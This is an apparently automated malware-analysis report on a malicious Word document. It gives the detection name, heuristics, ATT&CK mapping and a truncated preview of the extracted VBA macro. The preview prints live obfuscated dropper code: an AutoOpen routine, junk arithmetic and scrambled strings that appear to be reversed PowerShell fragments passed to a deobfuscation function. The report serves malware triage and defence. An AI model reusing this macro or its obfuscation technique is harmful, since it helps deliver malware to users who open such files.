MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for a Shell() call. This indicates the macro is designed to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent-6546695-0' suggests it acts as a dropper for further malicious payloads. The presence of macros and the dropper functionality strongly suggest a spearphishing attachment attack vector.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546695-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546695-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 157913 bytes |
SHA-256: aeb2dfcf70501ef9fe1d34af26e24c80c8d23d31c9599c1ba4b4de8a45eccd7e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DiniQDKPsfVn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub rXUYKn(WPzRhk)
BKAAPi = iukLS
JITlkV = (qOYJc / KJQVpm / 32988 / Fix(KLiwC)) + 42613 - CLng(NcjMr + CLng(75)) + OvNhL + 33513 * nmqXkU - CStr(29527) / ZvZBc / CLng(wlnizJ)
End Sub
Sub lozlfr(UHIazN)
ZsaRC = zConpX
RKawL = (UBztm / cUsSn / 96681 / Fix(PbXsM)) + 32344 - CLng(OdjAJv + CLng(15259)) + dJhJP + 83743 * VbznMa - CStr(50953) / kApnH / CLng(tSNhOt)
SwjqzD = jldjKW
wtYEX = (XwzUIA / jrTbAz / 3655 / Fix(iPzOW)) + 68287 - CLng(zXFck + CLng(73365)) + YodrGT + 37588 * OiwXHr - CStr(34081) / iMUCR / CLng(bpBEzz)
OfPumT = wJrijh
ORwcj = (VXQPjj / NnqBUT / 39397 / Fix(DhdUXn)) + 5811 - CLng(VmTjc + CLng(24382)) + CbTSH + 83571 * AKGZR - CStr(20587) / pNPNB / CLng(kVHIu)
End Sub
Sub wucPw(AQnZB)
NInhS = wVsFf
DWbAm = (UKXotU / uJIQu / 60825 / Fix(MNztX)) + 7296 - CLng(tKYas + CLng(28981)) + MZpzd + 13104 * qiYPT - CStr(18596) / EpFwZ / CLng(MpWid)
ibzzOA = TijSQ
YKWja = (EuioVS / SzrWDH / 43320 / Fix(ciqiKO)) + 26852 - CLng(oUWohB + CLng(11188)) + GvEYoA + 74208 * jmhGcM - CStr(63175) / uVwff / CLng(QPqEp)
End Sub
Sub Autoopen()
On Error Resume Next
wiuRt = QHCzG
rMwYhH = (cnLuM / aLBfp / 65995 / Fix(KSjCrP)) + 24874 - CLng(wZJwOU + CLng(76232)) + Grhiq + 25711 * nkhNTp - CStr(28832) / MPVRZf / CLng(jRumfO)
SPjlZdJjzPN (zzkms + sfIuEVmJaPSBJ + oHzuzm)
SKCtlh = whtCOn
KQoDh = (lmjdj / UnFPbU / 74765 / Fix(iWOABz)) + 30346 - CLng(QEhYF + CLng(67999)) + rLrPUI + 60783 * ZNnMLr - CStr(33133) / ibAjo / CLng(nBkCf)
End Sub
Sub fvIsl(OEkFS)
wwpnOk = Nznzw
CooYp = (RcJvdF / bBdMhc / 17094 / Fix(isNzn)) + 98242 - CLng(RWrwLn + CLng(66953)) + ZfuaA + 3208 * ALiTJD - CStr(70607) / FWnhUw / CLng(YCjUKn)
jtHsj = jmCIV
rBQUpu = (kmaXGO / zGsuj / 83155 / Fix(zioLR)) + 44032 - CLng(FTTfMb + CLng(9251)) + HhqZdD + 33159 * WAiHH - CStr(50158) / IbdruW / CLng(IYXAiS)
runTW = LDGOwj
SLmPZ = (ZLDijK / fZSBc / 47330 / Fix(ziGqnk)) + 52236 - CLng(FVPtNw + CLng(17982)) + lIbztv + 77039 * EJTTl - CStr(71802) / lZhYo / CLng(vbpEq)
End Sub
Sub iSpwE(bjtBZ)
Equmi = IwTQi
faUsp = (luCoFt / MOwKE / 21697 / Fix(AcUwKJ)) + 94245 - CLng(wumSn + CLng(41073)) + iBjqM + 29711 * CPkBXS - CStr(4265) / mOEuT / CLng(FWijj)
End Sub
Attribute VB_Name = "wICmFtvju"
Sub OwUVaE(IliWk)
XNtBN = fAJcB
tNwviX = (QLAGZ / cBJZvF / 83446 / Fix(BiYMr)) + 63920 - CLng(PaEVS + CLng(81462)) + rPNGHD + 37646 * XHTDlX - CStr(42742) / NXKRsj / CLng(jmpHB)
End Sub
Function sfIuEVmJaPSBJ()
On Error Resume Next
vkHHvK = MpznuF
Rsovn = (zqzIZn / pdTRw / 35036 / Fix(bWMwp)) + 25776 - CLng(OYaWWn + CLng(54326)) + rwuTI + 71909 * nwiIB - CStr(8138) / Vfqcuf / CLng(frGaQl)
TiNXGd = irZKWA
AqjGwV = (OwazjR / zkrScn / 50796 / Fix(WDLOm)) + 91213 - CLng(sfipu + CLng(19866)) + NmKnB + 8520 * nYaMWh - CStr(13661) / suNPsT / CLng(vjjrFG)
QIhWzdafbD = jXGSVA("Pjs]RAhC[+801]RAhC['+'((ECA'+'LpeR.)LkrQ", 28133 + 5 - 28133, 28133 + 33 - 28133)
UqWSvX = IolVc
ikCPNC = (njciS / kqaEKw / 48375 / Fix(DjpEmk)) + 57809 - CLng(GbtPkw + CLng(21491)) + TdDwGl + 28463 * zOmNhk - CStr(53040) / DqaBN / CLng(bSfDd)
iNVEvk = OdEAzR
AANtE = (kMOWS / OUzZa / 98906 / Fix(WjolvS)) + 14946 - CLng(ArVci + CLng(85873)) + iIsvD + 82868 * Wzzmd - CStr(41310) / PEdBC / CLng(UMOSbw)
LMiISdIWK = jXGSVA("0scOB85fl7+fl7l+Mefl7'+'+fl7lxe.Mel( + B'+'SNb'+'Ex + MelhfDMel + cilbup:vnebfl7'+'+fl7Ex = CDSbfl7+HH", 832 + 3 - 832, 832 + 93 - 832)
kUstn = Dlqhi
FJKomJ = (mpknsb / zrVtaU / 12080 / Fix(cBHFwE)) + 34690 - CLng(YWzEwm + CLng(18185)) + cIlKO + 653 * ASMbMQ - CStr(93946) / KqSjI / CLng(hKlUEL)
waNUj = NRBZr
aFODnh = (zMJVt / jRiaCT / 93243 / Fix(inaqnQ)) + 12045 - CLng(pUuqd + CLng(76030)) + rwDXCi + 80023 * FUfCif - CStr(82657) / FvorRn / CLng(AQDdX)
TwcTtO = jXGSVA("u7un@7ADaU", 32759 + 3 - 32759, 32759 + 1 - 32759)
bDLtjr = zwtIsz
WHNXo = (WovovQ / jDHzA / 35622 / Fix(iQUJwn))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.